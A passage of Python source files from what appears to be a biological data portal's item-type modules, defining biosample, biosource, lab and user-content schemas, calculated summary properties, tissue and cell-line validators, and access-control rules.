embedded_list = _build_biosample_embedded_list()
name_key = 'accession'
@calculated_property(schema={
"title": "Modifications summary",
"description": "Summary of any modifications on the biosample.",
"type": "string",
})
def modifications_summary(self, request, modifications=None):
""" Requires modifications.modification_name (display_title embeds) """
if modifications:
ret_str = ''
for mod in modifications:
mod_props = get_item_or_none(request, mod, 'modifications')
if mod_props and mod_props.get('modification_name'):
ret_str += (mod_props['modification_name'] + ' and ')
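# every name appended above carries a trailing ' and '; the [:-5] below trims the last one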
if len(ret_str) > 0:
return ret_str[:-5]
else:
return 'None'
return 'None'
@calculated_property(schema={
"title": "Modifications summary short",
"description": "Shorter summary of any modifications on the biosample for tables.",
"type": "string",
})
def modifications_summary_short(self, request, modifications=None):
if modifications:
# use only the first modification
mod_props = get_item_or_none(request, modifications[0], 'modifications')
if mod_props and mod_props.get('modification_name_short'):
return mod_props['modification_name_short']
return 'None'
@calculated_property(schema={
"title": "Treatment summary",
"description": "Summary of treatments on the biosample.",
"type": "string",
})
def treatments_summary(self, request, treatments=None):
""" Just relies on display title, which should be properly embedded. """
if treatments:
treat_list = []
for tmt in treatments:
treat_props = get_item_or_none(request, tmt, 'treatments')
treat_list.append(treat_props.get('display_title'))
return ' and '.join([t for t in treat_list if t])
return 'None'
@calculated_property(schema={
"title": "Tissue, Organ/System Info",
"description": "Useful faceting info for biosample",
"type": "object",
"properties": {
"tissue_source": {
"type": "string"
},
"organ_system": {
"type": "array",
"items": {
"type": "string"
}
},
}
})
def tissue_organ_info(self, request, biosource, cell_culture_details=None):
    """ For efficiency and practicality we first check to see if there are cell culture details
        and if there are (only checking the first one as the differentiation state should be the same on all)
        does it have 'tissue' term? If so use it to populate property and if not then check the biosource(s)
        and if there are more than one (no cases so far) see if there is tissue and if so if different call mixed
    """
    # NOTE: 2020-10-20 although it is possible for there to be both multiple biosources and cell_culture_details
    # in one biosample - there are no cases and are unlikely to be in the future but if there ever were there
    # would potentially be some imprecision in the prop values for that case
    sample_info = {}
    tissue = None
    organ = []
    if cell_culture_details:  # this is a list but for ccd only take first as all should be same tissue if there
        cell_culture_details = _get_item_info(request, [cell_culture_details[0]], 'cell_culture_details')[0]
        if cell_culture_details and 'tissue' in cell_culture_details:
            tissue, organ = _get_sample_tissue_organ(request, cell_culture_details.get('tissue'))
    if not tissue:  # ccd was absent or had no tissue info so check the biosource
        biosource = _get_item_info(request, biosource, 'biosources')
        tissue_terms = set()
        for bios in biosource:
            # generally only one but account for edge case of multiple with different tissue
            if 'tissue' in bios:
                tissue_terms.add(bios.get('tissue'))
        if not tissue_terms:
            return None  # no tissue found
        elif len(tissue_terms) == 1:  # we have a single tissue (usual case)
            (tterm, ) = tissue_terms
            tissue, organ = _get_sample_tissue_organ(request, tterm)
        else:  # edge case of more than one tissue mark it as mixed but return all the relevant slims
            for term in tissue_terms:
                _, organs = _get_sample_tissue_organ(request, term)
                organ.extend(organs)
            organ = list(set([o for o in organ if o]))
            tissue = 'mixed tissue'
    # put info in right place and return it
    if tissue:
        sample_info['tissue_source'] = tissue
    if organ:
        sample_info['organ_system'] = organ
    if sample_info:
        return sample_info
    return None
@calculated_property(schema={
"title": "Biosource summary",
"description": "Summary of any biosources comprising the biosample.",
"type": "string",
})
def biosource_summary(self, request, biosource, cell_culture_details=None):
    """ XXX: This field, if embedded, needs embeds adjusted. """
    ret_str = ''
    for bios in biosource:
        bios_props = get_item_or_none(request, bios, 'biosources')
        if bios_props and bios_props.get('biosource_name'):
            ret_str += (bios_props['biosource_name'] + ' and ')
    if len(ret_str) > 0:
        ret_str = ret_str[:-5]
        if cell_culture_details:  # will assume same differentiation if multiple bccs
            cc_props = get_item_or_none(request, cell_culture_details[0], 'biosample_cell_cultures', frame='embedded')
            if (cc_props and 'tissue' in cc_props and
                    cc_props.get('in_vitro_differentiated') == 'Yes'):
                ret_str = ret_str + ' differentiated to ' + cc_props['tissue'].get('display_title')
        return ret_str
    return 'None'  # pragma: no cover
@calculated_property(schema={
"title": "Sample type",
"description": "The type of biosample used in an experiment.",
"type": "string",
})
def biosample_type(self, request, biosource, cell_culture_details=None):
biosource_types = []
for bs in biosource:
# silliness in case we ever have multiple biosources
biosource = get_item_or_none(request, bs, 'biosources')
if biosource:
btype = biosource.get('biosource_type')
biosource_types.append(btype)
biosource_types = list(set(biosource_types))
if len(biosource_types) > 1:
# hopefully rare or never happen
return 'mixed sample'
elif len(biosource_types) < 1: # pragma: no cover
# shouldn't happen so raise an exception
raise Exception("Biosource has no types: %s" % biosource_types)
# we've got a single type of biosource
if cell_culture_details: # this is now an array but just check the first
cell_culture = get_item_or_none(request, cell_culture_details[0], 'biosample_cell_cultures')
if cell_culture:
if cell_culture.get('in_vitro_differentiated') == 'Yes':
return 'in vitro differentiated cells'
biosource_type = biosource_types[0]
if biosource_type == 'multicellular organism':
biosource_type = 'whole organism'
elif biosource_type == 'stem cell derived cell line':
biosource_type = 'stem cell'
elif biosource_type.endswith(' line'):
biosource_type = biosource_type[:-5]
if biosource_type == 'tissue':
return biosource_type
return biosource_type + 's'
@calculated_property(schema={
"title": "Sample Category",
"description": "The category of biosample used in an experiment.",
"type": "string",
})
def biosample_category(self, request, biosource, cell_culture_details=None):
    if len(biosource) > 1:
        return ['Mixed samples']
    categories = []
    biosource = get_item_or_none(request, biosource[0], 'biosources')
    if biosource:
        categories = biosource.get('biosource_category', [])
    if cell_culture_details:  # this is now an array but just check the first
        cell_culture = get_item_or_none(request, cell_culture_details[0], 'biosample_cell_cultures')
        if cell_culture:
            if cell_culture.get('in_vitro_differentiated') == 'Yes':
                categories.append('In vitro Differentiation')
                return [c for c in categories if 'stem cell' not in c]
    if categories:
        return categories
def _update(self, properties, sheets=None):
    # update self first to ensure 'biosample_relation' are stored in self.properties
    super(Biosample, self)._update(properties, sheets)
    DicRefRelation = {
        "derived from": "parent of",
        "parent of": "derived from"
    }
    acc = str(self.uuid)
    if 'biosample_relation' in properties.keys():
        for relation in properties["biosample_relation"]:
            switch = relation["relationship_type"]
            rev_switch = DicRefRelation[switch]
            related_bs = relation["biosample"]
            relationship_entry = {"relationship_type": rev_switch, "biosample": acc}
            rel_dic = {'biosample_relation': [relationship_entry, ]}
            target_bs = self.collection.get(related_bs)
            # case one we don't have relations
            if 'biosample_relation' not in target_bs.properties.keys():
                target_bs.properties.update(rel_dic)
                target_bs.update(target_bs.properties)
            else:
                # case two we have relations but not the one we need
                for target_relation in target_bs.properties['biosample_relation']:
                    if target_relation['biosample'] == acc:
                        break
                else:
                    # make data for new biosample_relation
                    target_bs.properties['biosample_relation'].append(relationship_entry)
                    target_bs.update(target_bs.properties)
def _get_sample_tissue_organ(request, tissue_id):
""" Helper function used in the tissue_organ_info calculated_property
"""
tissue = None
organ_system = []
tissue_term = _get_item_info(request, [tissue_id], 'ontology_terms')[0] # 1 item list
if tissue_term:
tissue = tissue_term.get('display_title')
if 'slim_terms' in tissue_term:
slim_terms = _get_item_info(request, tissue_term.get('slim_terms'), 'ontology_terms')
for st in slim_terms:
if st.get('is_slim_for') in ['developmental', 'system', 'organ']:
organ_system.append(st.get('display_title'))
return tissue, organ_system
def _get_item_info(request, item, itype):
""" Helper function used in the tissue_organ_info calculated_property
Getting object representation of Items which may be passed as a list
may have more than one associated Item
"""
items = []
for it in item:
items.append(get_item_or_none(request, it, itype))
# don't want any None values
return [i for i in items if i]
@calculated_property(context=Biosample, category='action')
def clone(context, request):
"""If the user submits for any lab, allow them to clone
This is like creating, but keeps previous fields"""
if request.has_permission('create'):
return {
'name': 'clone',
'title': 'Clone',
'profile': '/profiles/{ti.name}.json'.format(ti=context.type_info),
'href': '{item_uri}#!clone'.format(item_uri=request.resource_path(context)),
}
```
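The `_update` override in `Biosample` above mirrors each `biosample_relation` entry onto the related biosample, using `DicRefRelation` to invert the relationship type. Below is a minimal sketch of that bookkeeping over plain dicts keyed by uuid instead of stored snovault items; the uuids and the helper name are made up for illustration.
```python
# Illustrative sketch only: the reverse-relation bookkeeping done by
# Biosample._update, restated over plain dicts keyed by uuid.
REVERSE_RELATION = {
    "derived from": "parent of",
    "parent of": "derived from",
}

def mirror_relations(source_uuid, source_props, items_by_uuid):
    """Add the reverse of each relation on the source item to the related item."""
    for relation in source_props.get('biosample_relation', []):
        reverse_entry = {
            'relationship_type': REVERSE_RELATION[relation['relationship_type']],
            'biosample': source_uuid,
        }
        target = items_by_uuid[relation['biosample']]
        existing = target.setdefault('biosample_relation', [])
        # only add the reverse link if the target does not already point back
        if not any(rel['biosample'] == source_uuid for rel in existing):
            existing.append(reverse_entry)

items = {
    'parent-uuid': {'biosample_relation': [
        {'relationship_type': 'parent of', 'biosample': 'child-uuid'}]},
    'child-uuid': {},
}
mirror_relations('parent-uuid', items['parent-uuid'], items)
assert items['child-uuid']['biosample_relation'] == [
    {'relationship_type': 'derived from', 'biosample': 'parent-uuid'}]
```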
#### File: encoded/types/biosource.py
```python
from snovault import (
calculated_property,
collection,
load_schema,
)
from snovault.validators import (
validate_item_content_post,
validate_item_content_put,
validate_item_content_patch,
validate_item_content_in_place,
no_validate_item_content_post,
no_validate_item_content_put,
no_validate_item_content_patch
)
from snovault.crud_views import (
collection_add,
item_edit,
)
from snovault.util import debug_log
from pyramid.view import view_config
from .base import (
Item,
get_item_or_none,
lab_award_attribution_embed_list
)
from .dependencies import DependencyEmbedder
def _build_biosource_embedded_list():
""" Helper function intended to be used to create the embedded list for biosource.
All types should implement a function like this going forward.
"""
modification_embeds = DependencyEmbedder.embed_defaults_for_type(base_path='modifications', t='modification')
modification_target_embeds = DependencyEmbedder.embed_defaults_for_type(base_path='modifications.target_of_mod',
t='bio_feature')
tissue_embeds = DependencyEmbedder.embed_for_type(base_path='tissue', t='ontology_term',
additional_embeds=['synonyms'])
tissue_slim_embeds = DependencyEmbedder.embed_defaults_for_type(base_path='tissue.slim_terms', t='ontology_term')
cell_line_embeds = DependencyEmbedder.embed_for_type(base_path='cell_line', t='ontology_term',
additional_embeds=['synonyms'])
cell_line_slim_embeds = DependencyEmbedder.embed_defaults_for_type(base_path='cell_line.slim_terms',
t='ontology_term')
sop_embeds = DependencyEmbedder.embed_defaults_for_type(base_path='SOP_cell_line', t='protocol')
return (
Item.embedded_list + lab_award_attribution_embed_list + modification_embeds + modification_target_embeds +
tissue_embeds + tissue_slim_embeds + cell_line_embeds + cell_line_slim_embeds + sop_embeds + [
# Individual linkTo
'individual.accession',
'individual.age',
'individual.age_units',
'individual.sex',
'individual.life_stage',
'individual.mouse_life_stage',
'individual.mouse_strain',
'individual.ethnicity',
'individual.health_status',
# Organism linkTo
'individual.organism.name',
'individual.organism.scientific_name',
# Ontology linkTo
'tissue.source_ontologies.ontology_name',
]
)
@collection(
name='biosources',
unique_key='accession',
properties={
'title': 'Biosources',
'description': 'Cell lines and tissues used for biosamples',
})
class Biosource(Item):
"""Biosource class."""
item_type = 'biosource'
name_key = 'accession'
schema = load_schema('encoded:schemas/biosource.json')
embedded_list = _build_biosource_embedded_list()
@calculated_property(schema={
"title": "Biosource name",
"description": "Specific name of the biosource.",
"type": "string",
})
def biosource_name(self, request, biosource_type, individual=None,
cell_line=None, cell_line_tier=None, tissue=None,
modifications=None, override_biosource_name=None):
if override_biosource_name:
# if this field is present just return it
return override_biosource_name
cell_line_types = [
'primary cell',
'primary cell line',
'immortalized cell line',
'stem cell',
'induced pluripotent stem cell',
'stem cell derived cell line',
]
mod_str = ''
if modifications:
mod_str = ' with ' + ', '.join([get_item_or_none(request, mod, 'modifications').get('modification_name_short', '')
for mod in modifications])
# elif modifications and len(modifications) > 1:
# mod_str = ' with genetic modifications'
if biosource_type == "tissue":
if tissue:
tissue_props = get_item_or_none(request, tissue, 'ontology_terms')
if tissue_props:
return tissue_props.get('preferred_name') + mod_str
else:
return biosource_type + mod_str
elif biosource_type in cell_line_types:
if cell_line:
cell_line_props = get_item_or_none(request, cell_line, 'ontology_terms')
if cell_line_props:
cell_line_name = cell_line_props.get('preferred_name')
if cell_line_tier:
if cell_line_tier != 'Unclassified':
return cell_line_name + ' (' + cell_line_tier + ')' + mod_str
return cell_line_name + mod_str
return biosource_type + mod_str
elif biosource_type == "multicellular organism":
if individual:
organism_name = 'Unknown'
individual_props = get_item_or_none(request, individual, 'individuals')
if individual_props:
organism = individual_props.get('organism')
organism_props = get_item_or_none(request, organism, 'organisms')
if organism_props:
organism_name = organism_props['name']
return "whole " + organism_name + mod_str
return biosource_type + mod_str
@calculated_property(schema={
"title": "Biosource categories",
"description": "Categories for the biosource.",
"type": "array",
"items": {
"title": "Category",
"type": "string"
}
})
def biosource_category(self, request, biosource_type, individual=None,
cell_line=None, cell_line_tier=None, tissue=None,
modifications=None):
oterms = self.registry['collections']['OntologyTerm']
tid2cat = {
'EFO:0003042': 'H1-hESC',
'EFO:0002784': 'GM12878',
'4DN:0000014': 'HFF (c6 or hTERT)',
'EFO:0009318': 'HFF (c6 or hTERT)',
'4DN:0000001': 'HFF (c6 or hTERT)',
'4DN:0000005': 'WTC-11',
'EFO:0009747': 'WTC-11',
'EFO:0001196': 'IMR-90',
'4DN:0000260': 'Tier 2',
'4DN:0000250': 'Tier 2',
'EFO:0002824': 'Tier 2',
'4DN:0000003': 'Tier 2',
'EFO:0007598': 'Tier 2',
'EFO:0002067': 'Tier 2',
'EFO:0003045': 'Tier 2',
'EFO:0002869': 'Tier 2',
'EFO:0001182': 'Tier 2',
'4DN:0000004': 'Tier 2',
'4DN:0000002': 'Tier 2',
'4DN:0000262': 'Tier 2',
'EFO:0009319': 'Tier 2'
}
category = []
tiered_line_cat = {}
for tid, cat in tid2cat.items():
oterm = oterms.get(tid)
if oterm:
tiered_line_cat[str(oterm.uuid)] = cat
# import pdb; pdb.set_trace()
        cl_term = None
        if cell_line:
            cl_term = get_item_or_none(request, cell_line, 'ontology-terms')
            cluid = cl_term.get('uuid') if cl_term else None
if cluid and cluid in tiered_line_cat:
category.append(tiered_line_cat[cluid])
if biosource_type in ['stem cell', 'induced pluripotent stem cell',
'stem cell derived cell line']:
ind = get_item_or_none(request, individual, 'individuals')
try:
ind_at_type = ind.get('@type', [])
except AttributeError:
ind_at_type = []
for at in ind_at_type:
if 'Human' in at:
category.append('Human stem cell')
elif 'Mouse' in at:
category.append('Mouse stem cell')
elif biosource_type == 'primary cell':
category.append('Primary Cells')
elif biosource_type in ['tissue', 'multicellular organism']:
category.append('Multicellular Tissue')
if tissue:
            tis_term = get_item_or_none(request, tissue, 'ontology-terms')
            # case for 1000 genomes/Hap Map
            if tis_term and tis_term.get('preferred_name') == 'B-lymphocyte':
if cl_term:
cl_name = cl_term.get('term_name')
if cl_name.startswith('GM') or cl_name.startswith('HG'):
category.append('1000 genomes/Hap Map')
if not category:
category.append('Other')
return category
@calculated_property(schema={
"title": "Display Title",
"description": "A calculated title for every object in 4DN",
"type": "string"
})
def display_title(self, request, biosource_type, individual=None,
cell_line=None, cell_line_tier=None, tissue=None, modifications=None, override_biosource_name=None):
return self.add_accession_to_title(self.biosource_name(request, biosource_type, individual, cell_line,
cell_line_tier, tissue, modifications, override_biosource_name))
class Collection(Item.Collection):
pass
# # validator for tissue field
def validate_biosource_tissue(context, request):
data = request.json
if 'tissue' not in data:
return
term_ok = False
tissue = data['tissue']
    ontology_name = None
    ontologies = []  # ensure defined even if the lookups below fail
try:
termuid = get_item_or_none(request, tissue, 'ontology-terms').get('uuid')
try:
# checking to see if our context is a collection or an item to set get
context.get('blah')
getter = context
except AttributeError:
getter = context.collection
term = getter.get(termuid)
ontologies = term.upgrade_properties()['source_ontologies']
except AttributeError:
pass
request.validated.update({})
for o in ontologies:
oname = get_item_or_none(request, o, 'ontologys').get('ontology_name')
if oname in ['Uberon', '4DN Controlled Vocabulary']:
term_ok = True
break
if not term_ok:
try:
tissuename = tissue.get('term_name')
except AttributeError:
tissuename = str(tissue)
request.errors.add('body', 'Biosource: invalid tissue term', 'Term: ' + tissuename + ' is not found in UBERON')
else:
request.validated.update({})
# validator for cell_line field
def validate_biosource_cell_line(context, request):
data = request.json
if 'cell_line' not in data:
return
term_ok = False
cell_line = data['cell_line']
try:
# checking to see if our context is a collection or an item to set get
context.get('blah')
getter = context
except AttributeError:
getter = context.collection
slimfor = None
try:
termuid = get_item_or_none(request, cell_line, 'ontology-terms').get('uuid')
term = getter.get(termuid)
slims = term.upgrade_properties().get('slim_terms', [])
for slim in slims:
slim_term = getter.get(slim)
slimfor = slim_term.upgrade_properties().get('is_slim_for')
if slimfor is not None and slimfor == 'cell':
term_ok = True
break
except AttributeError:
pass
if not term_ok:
try:
cellname = cell_line.get('term_name')
except AttributeError:
cellname = str(cell_line)
request.errors.add('body', 'Biosource: invalid cell_line term', 'Term: ' + cellname + ' is not a known valid cell line')
else:
request.validated.update({})
@view_config(context=Biosource.Collection, permission='add', request_method='POST',
validators=[validate_item_content_post, validate_biosource_cell_line, validate_biosource_tissue])
@view_config(context=Biosource.Collection, permission='add_unvalidated', request_method='POST',
validators=[no_validate_item_content_post],
request_param=['validate=false'])
@debug_log
def biosource_add(context, request, render=None):
return collection_add(context, request, render)
@view_config(context=Biosource, permission='edit', request_method='PUT',
validators=[validate_item_content_put, validate_biosource_cell_line, validate_biosource_tissue]) # , validate_biosource_cell_line])
@view_config(context=Biosource, permission='edit', request_method='PATCH',
validators=[validate_item_content_patch, validate_biosource_cell_line, validate_biosource_tissue]) # , validate_biosource_cell_line])
@view_config(context=Biosource, permission='edit_unvalidated', request_method='PUT',
validators=[no_validate_item_content_put],
request_param=['validate=false'])
@view_config(context=Biosource, permission='edit_unvalidated', request_method='PATCH',
validators=[no_validate_item_content_patch],
request_param=['validate=false'])
@view_config(context=Biosource, permission='index', request_method='GET',
validators=[validate_item_content_in_place, validate_biosource_cell_line, validate_biosource_tissue], # , validate_biosource_cell_line],
request_param=['check_only=true'])
@debug_log
def biosource_edit(context, request, render=None):
return item_edit(context, request, render)
```
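For the cell-line branch above, `biosource_name` joins the ontology term's `preferred_name`, an optional tier suffix, and a ` with ...` modification string. A minimal sketch of that composition with the `get_item_or_none` lookups replaced by already-fetched values; the term, tier, and modification names here are made up for illustration.
```python
# Sketch of the cell-line naming rule in Biosource.biosource_name above;
# item lookups are replaced by plain dicts/strings.
def compose_cell_line_name(cell_line_props, cell_line_tier=None, mod_names=None):
    mod_str = ' with ' + ', '.join(mod_names) if mod_names else ''
    name = cell_line_props.get('preferred_name')
    if cell_line_tier and cell_line_tier != 'Unclassified':
        return name + ' (' + cell_line_tier + ')' + mod_str
    return name + mod_str

print(compose_cell_line_name({'preferred_name': 'H1-hESC'}, 'Tier 1', ['GFP-LaminB1']))
# -> H1-hESC (Tier 1) with GFP-LaminB1
```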
#### File: encoded/types/lab.py
```python
from pyramid.security import (
Allow,
Deny,
Everyone,
)
from base64 import b64encode
from snovault import (
collection,
load_schema,
calculated_property
)
from .base import (
Item
)
ONLY_ADMIN_VIEW = [
(Allow, 'group.admin', ['view', 'edit']),
(Allow, 'group.read-only-admin', ['view']),
(Allow, 'remoteuser.INDEXER', ['view']),
(Allow, 'remoteuser.EMBED', ['view']),
(Deny, Everyone, ['view', 'edit'])
]
SUBMITTER_CREATE = []
ALLOW_EVERYONE_VIEW = [
(Allow, Everyone, 'view'),
]
ALLOW_EVERYONE_VIEW_AND_SUBMITTER_EDIT = [
(Allow, Everyone, 'view'),
(Allow, 'role.lab_submitter', 'edit'),
] + ONLY_ADMIN_VIEW
def _build_lab_embedded_list():
""" Helper function intended to be used to create the embedded list for lab.
All types should implement a function like this going forward.
"""
return Item.embedded_list + [
# Award linkTo
'awards.project',
'awards.name',
'awards.pi.last_name',
'awards.center_title'
]
@collection(
name='labs',
unique_key='lab:name',
properties={
'title': 'Labs',
'description': 'Listing of 4D Nucleome labs',
})
class Lab(Item):
"""Lab class."""
item_type = 'lab'
schema = load_schema('encoded:schemas/lab.json')
name_key = 'name'
embedded_list = _build_lab_embedded_list()
STATUS_ACL = {
'current': ALLOW_EVERYONE_VIEW_AND_SUBMITTER_EDIT,
'deleted': ONLY_ADMIN_VIEW,
'revoked': ALLOW_EVERYONE_VIEW,
'inactive': ALLOW_EVERYONE_VIEW,
}
@calculated_property(schema={
"title": "Correspondence",
"description": "Point of contact(s) for this Lab.",
"type": "array",
"uniqueItems": True,
"items": {
"title": "Lab Contact - Public Snippet",
"description": "A User associated with the lab who is also a point of contact.",
"type": "object",
"additionalProperties": False,
"properties": {
"display_title": {
"type": "string"
},
"contact_email": {
"type": "string",
"format": "email"
},
"@id": {
"type": "string"
}
}
}
})
def correspondence(self, request, pi=None, contact_persons=None):
"""
Definitive list of users (linkTo User) who are designated as point of contact(s) for this Lab.
Returns:
List of @IDs which refer to either PI or alternate list of contacts defined in `contact_persons`.
"""
contact_people = None
if contact_persons:
contact_people = contact_persons
elif pi:
contact_people = [pi]
def fetch_and_pick_embedded_properties(person_at_id):
'''Clear out some properties from person'''
try:
person = request.embed(person_at_id, '@@object')
except Exception:
return None
encoded_email = b64encode(person['contact_email'].encode('utf-8')).decode('utf-8') if person.get('contact_email') else None
return {
"contact_email": encoded_email, # Security against web scrapers
"@id": person.get('@id'),
"display_title": person.get('display_title')
}
if contact_people is not None:
contact_people_dicts = [ fetch_and_pick_embedded_properties(person) for person in contact_people ]
return [ person for person in contact_people_dicts if person is not None ]
def __init__(self, registry, models):
super().__init__(registry, models)
if hasattr(self, 'STATUS_ACL'):
self.STATUS_ACL.update(self.__class__.STATUS_ACL)
else:
self.STATUS_ACL = self.__class__.STATUS_ACL
def __ac_local_roles__(self):
"""This creates roles that the lab item needs so it can be edited & viewed"""
roles = {}
lab_submitters = 'submits_for.%s' % self.uuid
roles[lab_submitters] = 'role.lab_submitter'
lab_member = 'lab.%s' % self.uuid
roles[lab_member] = 'role.lab_member'
return roles
```
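`Lab.correspondence` above base64-encodes each `contact_email` before returning it, as a light deterrent to web scrapers; a consumer is expected to decode it client-side. A minimal round-trip sketch (the address is a placeholder):
```python
from base64 import b64encode, b64decode

contact_email = 'lab.contact@example.org'  # placeholder address
encoded = b64encode(contact_email.encode('utf-8')).decode('utf-8')
decoded = b64decode(encoded.encode('utf-8')).decode('utf-8')
assert decoded == contact_email
```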
#### File: encoded/types/user_content.py
```python
from uuid import uuid4
from snovault import (
abstract_collection,
calculated_property,
collection,
load_schema
)
from snovault.interfaces import STORAGE
from .base import (
Item,
ALLOW_CURRENT,
DELETED,
ALLOW_LAB_SUBMITTER_EDIT,
ALLOW_VIEWING_GROUP_VIEW,
ONLY_ADMIN_VIEW,
ALLOW_OWNER_EDIT,
ALLOW_ANY_USER_ADD,
lab_award_attribution_embed_list
)
import os
import requests
@abstract_collection(
name='user-contents',
unique_key='user_content:name',
properties={
'title': "User Content Listing",
'description': 'Listing of all types of content which may be created by people.',
})
class UserContent(Item):
item_type = 'user_content'
base_types = ['UserContent'] + Item.base_types
schema = load_schema('encoded:schemas/user_content.json')
embedded_list = lab_award_attribution_embed_list
STATUS_ACL = { # Defaults + allow owner to edit (in case owner has no labs or submit_for)
'released' : ALLOW_OWNER_EDIT + ALLOW_CURRENT,
'deleted' : ALLOW_OWNER_EDIT + DELETED,
'draft' : ALLOW_OWNER_EDIT + ONLY_ADMIN_VIEW,
'released to lab' : ALLOW_OWNER_EDIT + ALLOW_LAB_SUBMITTER_EDIT,
'released to project' : ALLOW_OWNER_EDIT + ALLOW_VIEWING_GROUP_VIEW,
# 'archived' : ALLOW_OWNER_EDIT + ALLOW_CURRENT,
# 'archived to project' : ALLOW_OWNER_EDIT + ALLOW_VIEWING_GROUP_VIEW
}
@calculated_property(schema={
"title": "Content",
"description": "Content (unused)",
"type": "string"
})
def content(self, request):
return None
@calculated_property(schema={
"title": "File Type",
"description": "Type of this Item (unused)",
"type": "string"
})
def filetype(self, request):
return None
def _update(self, properties, sheets=None):
if properties.get('name') is None and self.uuid is not None:
properties['name'] = str(self.uuid)
super(UserContent, self)._update(properties, sheets)
@classmethod
def create(cls, registry, uuid, properties, sheets=None):
submitted_by_uuid = properties.get('submitted_by')
lab_schema = cls.schema and cls.schema.get('properties', {}).get('lab')
award_schema = cls.schema and cls.schema.get('properties', {}).get('award')
if (
not submitted_by_uuid # Shouldn't happen
or (not lab_schema and not award_schema) # If not applicable for Item type (shouldn't happen as props defined on UserContent schema)
or ('lab' in properties or 'award' in properties) # If values exist already - ideal case - occurs for general submission process(es)
):
# Default for all other Items
return super(UserContent, cls).create(registry, uuid, properties, sheets)
submitted_by_item = registry[STORAGE].get_by_uuid(submitted_by_uuid)
if submitted_by_item:
# All linkTo property values, if present, are UUIDs
if 'lab' not in properties and 'lab' in submitted_by_item.properties:
# Use lab of submitter - N.B. this differs from other Items where lab comes from 'submits_for' list.
properties['lab'] = submitted_by_item.properties['lab']
if 'award' not in properties and 'lab' in submitted_by_item.properties:
lab_item = registry[STORAGE].get_by_uuid(submitted_by_item.properties['lab'])
if lab_item and len(lab_item.properties.get('awards', [])) > 0:
# Using first award as default/fallback when award not explicitly selected/sent.
properties['award'] = lab_item.properties['awards'][0]
return super(UserContent, cls).create(registry, uuid, properties, sheets)
@collection(
name='static-sections',
unique_key='user_content:name',
properties={
'title': 'Static Sections',
'description': 'Static Sections for the Portal',
})
class StaticSection(UserContent):
"""The Software class that contains the software... used."""
item_type = 'static_section'
schema = load_schema('encoded:schemas/static_section.json')
@calculated_property(schema={
"title": "Content",
"description": "Content for the page",
"type": "string"
})
def content(self, request, body=None, file=None):
if isinstance(body, str) or isinstance(body, dict) or isinstance(body, list):
# Don't need to load in anything. We don't currently support dict/json body (via schema) but could in future.
return body
if isinstance(file, str):
if file[0:4] == 'http' and '://' in file[4:8]: # Remote File
return get_remote_file_contents(file)
else: # Local File
file_path = os.path.abspath(os.path.dirname(os.path.realpath(__file__)) + "/../../.." + file) # Go to top of repo, append file
return get_local_file_contents(file_path)
return None
@calculated_property(schema={
"title": "File Type",
"description": "Type of file used for content",
"type": "string"
})
def filetype(self, request, body=None, file=None, options=None):
if options and options.get('filetype') is not None:
return options['filetype']
if isinstance(body, str):
return 'txt'
if isinstance(body, dict) or isinstance(body, list):
return 'json'
if isinstance(file, str):
filename_parts = file.split('.')
if len(filename_parts) > 1:
return filename_parts[len(filename_parts) - 1]
else:
return 'txt' # Default if no file extension.
return None
@collection(
name='higlass-view-configs',
unique_key='user_content:name',
properties={
'title': 'HiGlass Displays',
'description': 'Displays and view configurations for HiGlass',
})
class HiglassViewConfig(UserContent):
"""
Item type which contains a `view_config` property and other metadata.
"""
item_type = 'higlass_view_config'
schema = load_schema('encoded:schemas/higlass_view_config.json')
#@calculated_property(schema={
# "title": "ViewConfig Files",
# "description": "List of files which are defined in ViewConfig",
# "type": "array",
# "linkTo" : "File"
#})
#def viewconfig_files(self, request):
# '''
# TODO: Calculate which files are defined in viewconfig, if any.
# '''
# return None
#@calculated_property(schema={
# "title": "ViewConfig Tileset UIDs",
# "description": "List of UIDs which are defined in ViewConfig",
# "type": "array",
# "items" : {
# "type" : "string"
# }
#})
#def viewconfig_tileset_uids(self, request):
# '''
# TODO: Calculate which tilesetUids are defined in viewconfig, if any.
# '''
# return None
@calculated_property(schema={
"title": "File Type",
"description": "Type of this Item (unused)",
"type": "string"
})
def filetype(self, request):
return "HiglassViewConfig"
class Collection(Item.Collection):
'''
This extension of the default Item collection allows any User to create a new version of these.
Emulates base.py Item collection setting of self.__acl__
TODO:
Eventually we can move this up to UserContent or replicate it on JupyterNotebook if want any
User to be able to create new one.
'''
def __init__(self, *args, **kw):
super(HiglassViewConfig.Collection, self).__init__(*args, **kw)
self.__acl__ = ALLOW_ANY_USER_ADD
@collection(
name='microscope-configurations',
properties={
'title': 'Microscope Configurations',
'description': 'Collection of Metadata for microscope configurations of various Tiers',
})
class MicroscopeConfiguration(UserContent):
"""The MicroscopeConfiguration class that holds configuration of a microscope."""
item_type = 'microscope_configuration'
schema = load_schema('encoded:schemas/microscope_configuration.json')
STATUS_ACL = {
'released' : ALLOW_CURRENT,
'deleted' : DELETED,
'draft' : ALLOW_OWNER_EDIT + ALLOW_LAB_SUBMITTER_EDIT,
'released to project' : ALLOW_VIEWING_GROUP_VIEW
}
def _update(self, properties, sheets=None):
if properties.get('microscope'):
microscope = properties.get('microscope')
# set microscope ID if empty
if not microscope.get('ID'):
microscope['ID'] = str(uuid4())
# always sync item's description to microscope's description
microscopeDesc = microscope.get('Description', '')
properties['description'] = microscopeDesc
super(MicroscopeConfiguration, self)._update(properties, sheets)
@calculated_property(schema={
"title": "Display Title",
"description": "A calculated title for every object in 4DN",
"type": "string"
})
def display_title(self, microscope, title=None):
return title or microscope.get("Name")
class Collection(Item.Collection):
'''
This extension of the default Item collection allows any User to create a new version of these.
Emulates base.py Item collection setting of self.__acl__
'''
def __init__(self, *args, **kw):
super(MicroscopeConfiguration.Collection, self).__init__(*args, **kw)
self.__acl__ = ALLOW_ANY_USER_ADD
@collection(
name='image-settings',
properties={
'title': 'Image Settings',
'description': 'Listing of ImageSetting Items.',
})
class ImageSetting(UserContent):
"""Image Settings class."""
item_type = 'image_setting'
schema = load_schema('encoded:schemas/image_setting.json')
STATUS_ACL = {
'released' : ALLOW_CURRENT,
'deleted' : DELETED,
'draft' : ALLOW_OWNER_EDIT + ALLOW_LAB_SUBMITTER_EDIT,
'released to project' : ALLOW_VIEWING_GROUP_VIEW
}
class Collection(Item.Collection):
'''
This extension of the default Item collection allows any User to create a new version of these.
Emulates base.py Item collection setting of self.__acl__
'''
def __init__(self, *args, **kw):
super(ImageSetting.Collection, self).__init__(*args, **kw)
self.__acl__ = ALLOW_ANY_USER_ADD
def get_local_file_contents(filename, contentFilesLocation=None):
if contentFilesLocation is None:
full_file_path = filename
else:
full_file_path = contentFilesLocation + '/' + filename
if not os.path.isfile(full_file_path):
